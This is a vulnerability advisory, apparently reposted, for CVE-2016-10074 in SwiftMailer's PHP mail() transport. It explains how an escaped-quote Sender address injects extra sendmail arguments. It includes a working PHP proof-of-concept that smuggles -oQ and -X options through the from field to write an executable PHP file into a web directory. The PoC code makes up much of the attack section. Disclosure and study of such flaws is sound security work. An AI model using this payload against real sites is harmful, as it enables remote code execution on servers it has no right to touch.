DESCRIPTION
-------------------------
SwiftMailer class uses PHP mail() function as its default transport.
SwiftMailer suffers from the same vulnerability as the one disclosed in
PHPMailer in the advisory at:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
The following Sender address:
"Attacker -Param2 -Param3"@test.com
would cause SwiftMailer/mail() function to execute /usr/bin/sendmail with the
following list of arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@test.com]
which would not work for the attacker (Param2 and Param3 are passed within
the same argument of argv[3] )
Attackers can however break out of parameter no.3 with some extra escaping.
For example, by injecting an extra sequence of \" after the first argument,
the following Sender email:
"Attacker \" -Param2 -Param3"@test.com
when passed to SwiftMailer (and eventually to mail()) function would cause
sendmail to execute with:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
Which as can be seen would inject additional parameters of 4 & 5 to sendmail.
Attackers can exploit this to achieve code execution as shown in the PoC
below.
PROOF OF CONCEPT EXPLOIT
-------------------------
```
<?php
/*
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Video PoC
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// ------------------
// mail() param injection via the vulnerability in SwiftMailer
require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
->setFrom(array($email_from => 'PoC Exploit Payload'))
->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
```
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
全部评论 (1)